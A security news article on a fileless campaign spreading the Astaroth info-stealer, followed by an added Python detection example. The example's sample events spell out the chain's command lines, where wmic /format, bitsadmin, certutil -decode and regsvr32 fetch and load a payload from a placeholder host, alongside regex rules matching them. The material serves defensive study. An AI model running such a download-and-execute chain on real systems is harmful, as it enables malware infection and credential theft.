
Cybercrime spreads Astaroth Trojan with a fileless malware campaign


Andrea Lelli, Microsoft Defender ATP Research Team cyber security expert: Cybercrime is spreading a fileless malware campaign to infect victims with Astaroth Trojan

Cybercrime is spreading a fileless malware campaign to infect victims with the Astaroth Trojan. It was detected by Andrea Lelli of the Microsoft Defender ATP Research Team. Throughout a complex attack chain, the campaign ran only system tools; the attack involved multiple steps that use various fileless techniques. Astaroth is a notorious info-stealing malware known for stealing sensitive information such as credentials, keystrokes, and other data, which it exfiltrates to a remote attacker. The attacker can then use the stolen data to try to move laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground. Telemetry showed a sudden increase in the use of the WMIC tool to run a script, which made the researchers suspicious of a fileless attack. Upon further investigation, they realized that the campaign was trying to run the Astaroth backdoor directly in memory.

The cyber security experts: The steps of the fileless malware attacks

According to the cyber security experts, the malware attack followed these steps. A malicious link in a spear-phishing email leads to an LNK file. When double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool. All the payloads are Base64-encoded and are decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process. At no point during the attack chain is any file run that is not a system tool.
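Because every stage of the chain above is a legitimate Windows tool, a defender cannot block on the binary name alone; the signal is the combination of unusual arguments (WMIC /Format pointing at a remote location, Bitsadmin downloads, Certutil decoding, Regsvr32 loading a DLL from a user-writable path) and the fact that they appear together, often as children of wmic.exe. The following is an added example, not code from the article or from Microsoft, that runs simple matching rules over constructed process-creation events (parent image, image, command line). The sample events, the stage names, the placeholder host placeholder.invalid and the paths are all constructed for the example, and the rules are deliberately simplistic illustrations of the idea, not production detections.

```python
import re
from typing import Optional

# Constructed sample process-creation events (not real telemetry). Each tuple is
# (parent image, image, command line); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    ("explorer.exe", "wmic.exe",
     'wmic os get /format:"http://placeholder.invalid/v.xsl"'),
    ("wmic.exe", "bitsadmin.exe",
     "bitsadmin /transfer job1 /download /priority high "
     "http://placeholder.invalid/p1.b64 C:\\Users\\Public\\p1.b64"),
    ("wmic.exe", "certutil.exe",
     "certutil -decode C:\\Users\\Public\\p1.b64 C:\\Users\\Public\\p1.dll"),
    ("wmic.exe", "regsvr32.exe",
     "regsvr32 /s C:\\Users\\Public\\p1.dll"),
    # Benign administrative uses of the same tools, which should not match.
    ("services.exe", "wmic.exe", "wmic computersystem get model"),
    ("cmd.exe", "certutil.exe",
     "certutil -hashfile C:\\Windows\\System32\\notepad.exe SHA256"),
    ("msiexec.exe", "regsvr32.exe",
     "regsvr32 /s C:\\Windows\\System32\\example.dll"),
]

# A remote location: an HTTP(S) URL or a UNC path.
REMOTE = r'(https?://|\\\\)'


def _regsvr32_user_path(cmd: str) -> bool:
    """True when regsvr32 is asked to load a DLL from outside C:\\Windows."""
    m = re.search(r'([a-z]:\\[^\s"]+\.dll)', cmd)
    return m is not None and not m.group(1).startswith("c:\\windows\\")


# Stage name -> (expected image, predicate over the lower-cased command line).
# Illustrative rules written for this example; tune them before real use.
STAGES = {
    "wmic_remote_format": ("wmic.exe", lambda c: re.search(
        r'/format\s*:?\s*"?\s*' + REMOTE, c) is not None),
    "bitsadmin_download": ("bitsadmin.exe", lambda c: re.search(
        r'/(download|transfer)\b.*' + REMOTE, c) is not None),
    "certutil_decode": ("certutil.exe", lambda c: re.search(
        r'[-/]decode\b', c) is not None),
    "regsvr32_user_path": ("regsvr32.exe", _regsvr32_user_path),
}


def classify(parent: str, image: str, cmdline: str) -> Optional[str]:
    """Return the chain stage an event matches, or None if it looks benign."""
    cmd = cmdline.lower()
    for stage, (img, pred) in STAGES.items():
        if image.lower() == img and pred(cmd):
            return stage
    return None


def detect_chain(events, min_stages: int = 3) -> dict:
    """Classify every event and report which stages of the chain were seen.

    An alert is raised when at least `min_stages` distinct stages appear in the
    same batch; `spawned_by_wmic` counts matching events whose parent is
    wmic.exe, the strongest indicator that the stages belong to one chain.
    """
    seen = []
    spawned_by_wmic = 0
    for parent, image, cmdline in events:
        stage = classify(parent, image, cmdline)
        if stage is None:
            continue
        if stage not in seen:
            seen.append(stage)
        if parent.lower() == "wmic.exe":
            spawned_by_wmic += 1
    return {"stages": seen, "alert": len(seen) >= min_stages,
            "spawned_by_wmic": spawned_by_wmic}


if __name__ == "__main__":
    print(detect_chain(SAMPLE_EVENTS))
```

Run over the constructed batch, the four malicious events map to the four stages and the three benign ones map to nothing, so the batch alerts with three matching children of wmic.exe; the benign events alone do not alert. In a real deployment the grouping would be by process tree or host and time window rather than by batch, and the rules would need baselining against legitimate WMIC and Certutil usage in the environment.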
